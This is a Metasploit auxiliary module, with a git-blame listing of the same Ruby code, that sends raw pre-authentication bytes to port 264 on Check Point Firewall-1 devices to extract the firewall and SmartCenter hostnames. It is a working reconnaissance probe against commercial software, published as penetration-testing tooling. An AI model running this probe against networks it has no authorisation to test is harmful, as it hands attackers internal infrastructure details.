metasploit-framework/modules/auxiliary/gather/checkpoint_hostname.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure',
			'Description'    => %q{
				This module sends a query to the port 264/TCP on CheckPoint Firewall-1
				firewalls to obtain the firewall name and management station
				(such as SmartCenter) name via a pre-authentication topology request.
				Note that the SecuriTeam reference listed here is not the same vulnerabilty, but it
				does discus the same protocol and is somewhat related to this information
				disclosure.
			},
			'Author'         => [ 'patrick' ],
			'DisclosureDate' => 'Dec 14 2011', # Looks like this module is first real reference
			'References'     =>
				[
					# patrickw - None? Stumbled across, probably an old bug/feature but unsure.
					[ 'URL', 'http://www.osisecurity.com.au/advisories/' ], # Advisory coming soon, placeholder
					[ 'URL', 'http://www.securiteam.com/securitynews/5HP0D2A4UC.html' ] # Related-ish
				]
		))

		register_options(
			[
				Opt::RPORT(264),
			], self.class)
	end

	def autofilter
		false
	end

	def run
		print_status("Attempting to contact Checkpoint FW1 SecuRemote Topology service...")
		fw_hostname = nil
		sc_hostname = nil

		connect

		sock.put("\x51\x00\x00\x00")
		sock.put("\x00\x00\x00\x21")
		res = sock.get_once(4)
		if (res == "Y\x00\x00\x00")
			print_good("Appears to be a CheckPoint Firewall...")
			sock.put("\x00\x00\x00\x0bsecuremote\x00")
			res = sock.get_once
			if (res =~ /CN=(.+),O=(.+)\./i)
				fw_hostname = $1
				sc_hostname = $2
				print_good("Firewall Host: #{fw_hostname}")
				print_good("SmartCenter Host: #{sc_hostname}")
			end
		else
			print_error("Unexpected response: '#{res.inspect}'")
		end

		report_info(fw_hostname,sc_hostname)

		disconnect
	end

	# Only trust that it's real if we have a hostname. If you get a funny
	# response, it might not be what we think it is.
	def report_info(fw_hostname,sc_hostname)
		return unless fw_hostname
		host_info = {
			:host => datastore['RHOST'],
			:os_name => "Checkpoint Firewall-1",
			:purpose => "firewall"
		}
		host_info[:name] = fw_hostname
		host_info[:info] = "SmartCenter Host: #{sc_hostname}" if sc_hostname
		report_host(host_info)
		svc_info = {
			:host => datastore['RHOST'],
			:port => datastore['RPORT'],
			:proto => "tcp",
			:name => "securemote"
		}
		report_service(svc_info)
	end

end
Added checkpoint_hostname aux module. 2011-12-14 20:10:30 +08:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
Fix up the boilerplate comment to use a better url 2012-02-21 09:40:50 +08:00			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
Added checkpoint_hostname aux module. 2011-12-14 20:10:30 +08:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Auxiliary`

			`include Msf::Exploit::Remote::Tcp`

			`def initialize(info = {})`
			`super(update_info(info,`
Adds reporting to Patrick's Checkpoint module Also refers to port 264/TCP as the SecuRemote service instead of the Topology service (I believe this is correct) Reporting is initially conservative -- if we don't get something for fw_hostname, then don't bother reporting at all; assume we're mis-identifying the target. 2011-12-21 05:44:05 +08:00			`'Name' => 'CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure',`
Added checkpoint_hostname aux module. 2011-12-14 20:10:30 +08:00			`'Description' => %q{`
Adds reporting to Patrick's Checkpoint module Also refers to port 264/TCP as the SecuRemote service instead of the Topology service (I believe this is correct) Reporting is initially conservative -- if we don't get something for fw_hostname, then don't bother reporting at all; assume we're mis-identifying the target. 2011-12-21 05:44:05 +08:00			`This module sends a query to the port 264/TCP on CheckPoint Firewall-1`
Added checkpoint_hostname aux module. 2011-12-14 20:10:30 +08:00			`firewalls to obtain the firewall name and management station`
Adds reporting to Patrick's Checkpoint module Also refers to port 264/TCP as the SecuRemote service instead of the Topology service (I believe this is correct) Reporting is initially conservative -- if we don't get something for fw_hostname, then don't bother reporting at all; assume we're mis-identifying the target. 2011-12-21 05:44:05 +08:00			`(such as SmartCenter) name via a pre-authentication topology request.`
Adding ref/disclosure date to checkpoint module Talked with patrick, this all looks correct now. 2011-12-22 00:59:02 +08:00			`Note that the SecuriTeam reference listed here is not the same vulnerabilty, but it`
			`does discus the same protocol and is somewhat related to this information`
			`disclosure.`
Added checkpoint_hostname aux module. 2011-12-14 20:10:30 +08:00			`},`
			`'Author' => [ 'patrick' ],`
Adding ref/disclosure date to checkpoint module Talked with patrick, this all looks correct now. 2011-12-22 00:59:02 +08:00			`'DisclosureDate' => 'Dec 14 2011', # Looks like this module is first real reference`
Added checkpoint_hostname aux module. 2011-12-14 20:10:30 +08:00			`'References' =>`
			`[`
			`# patrickw - None? Stumbled across, probably an old bug/feature but unsure.`
Adding ref/disclosure date to checkpoint module Talked with patrick, this all looks correct now. 2011-12-22 00:59:02 +08:00			`[ 'URL', 'http://www.osisecurity.com.au/advisories/' ], # Advisory coming soon, placeholder`
			`[ 'URL', 'http://www.securiteam.com/securitynews/5HP0D2A4UC.html' ] # Related-ish`
Added checkpoint_hostname aux module. 2011-12-14 20:10:30 +08:00			`]`
			`))`

			`register_options(`
			`[`
			`Opt::RPORT(264),`
			`], self.class)`
			`end`

			`def autofilter`
			`false`
			`end`

			`def run`
Adds reporting to Patrick's Checkpoint module Also refers to port 264/TCP as the SecuRemote service instead of the Topology service (I believe this is correct) Reporting is initially conservative -- if we don't get something for fw_hostname, then don't bother reporting at all; assume we're mis-identifying the target. 2011-12-21 05:44:05 +08:00			`print_status("Attempting to contact Checkpoint FW1 SecuRemote Topology service...")`
			`fw_hostname = nil`
			`sc_hostname = nil`

Added checkpoint_hostname aux module. 2011-12-14 20:10:30 +08:00			`connect`

			`sock.put("\x51\x00\x00\x00")`
			`sock.put("\x00\x00\x00\x21")`
Fixup on checkpoint firewall module get() should get get_once() (intent is to get 4 bytes, not timeout after 4 seconds), no need to escape equals signs in regexes, no need to newline the unexpected responses. 2011-12-22 01:21:46 +08:00			`res = sock.get_once(4)`
Added checkpoint_hostname aux module. 2011-12-14 20:10:30 +08:00			`if (res == "Y\x00\x00\x00")`
			`print_good("Appears to be a CheckPoint Firewall...")`
			`sock.put("\x00\x00\x00\x0bsecuremote\x00")`
			`res = sock.get_once`
Fixup on checkpoint firewall module get() should get get_once() (intent is to get 4 bytes, not timeout after 4 seconds), no need to escape equals signs in regexes, no need to newline the unexpected responses. 2011-12-22 01:21:46 +08:00			`if (res =~ /CN=(.+),O=(.+)\./i)`
Adds reporting to Patrick's Checkpoint module Also refers to port 264/TCP as the SecuRemote service instead of the Topology service (I believe this is correct) Reporting is initially conservative -- if we don't get something for fw_hostname, then don't bother reporting at all; assume we're mis-identifying the target. 2011-12-21 05:44:05 +08:00			`fw_hostname = $1`
			`sc_hostname = $2`
			`print_good("Firewall Host: #{fw_hostname}")`
			`print_good("SmartCenter Host: #{sc_hostname}")`
Added checkpoint_hostname aux module. 2011-12-14 20:10:30 +08:00			`end`
			`else`
Fixup on checkpoint firewall module get() should get get_once() (intent is to get 4 bytes, not timeout after 4 seconds), no need to escape equals signs in regexes, no need to newline the unexpected responses. 2011-12-22 01:21:46 +08:00			`print_error("Unexpected response: '#{res.inspect}'")`
Added checkpoint_hostname aux module. 2011-12-14 20:10:30 +08:00			`end`

Adds reporting to Patrick's Checkpoint module Also refers to port 264/TCP as the SecuRemote service instead of the Topology service (I believe this is correct) Reporting is initially conservative -- if we don't get something for fw_hostname, then don't bother reporting at all; assume we're mis-identifying the target. 2011-12-21 05:44:05 +08:00			`report_info(fw_hostname,sc_hostname)`

Added checkpoint_hostname aux module. 2011-12-14 20:10:30 +08:00			`disconnect`
			`end`

Adds reporting to Patrick's Checkpoint module Also refers to port 264/TCP as the SecuRemote service instead of the Topology service (I believe this is correct) Reporting is initially conservative -- if we don't get something for fw_hostname, then don't bother reporting at all; assume we're mis-identifying the target. 2011-12-21 05:44:05 +08:00			`# Only trust that it's real if we have a hostname. If you get a funny`
			`# response, it might not be what we think it is.`
			`def report_info(fw_hostname,sc_hostname)`
			`return unless fw_hostname`
			`host_info = {`
			`:host => datastore['RHOST'],`
			`:os_name => "Checkpoint Firewall-1",`
			`:purpose => "firewall"`
			`}`
			`host_info[:name] = fw_hostname`
			`host_info[:info] = "SmartCenter Host: #{sc_hostname}" if sc_hostname`
			`report_host(host_info)`
			`svc_info = {`
			`:host => datastore['RHOST'],`
			`:port => datastore['RPORT'],`
			`:proto => "tcp",`
			`:name => "securemote"`
			`}`
			`report_service(svc_info)`
			`end`

Added checkpoint_hostname aux module. 2011-12-14 20:10:30 +08:00			`end`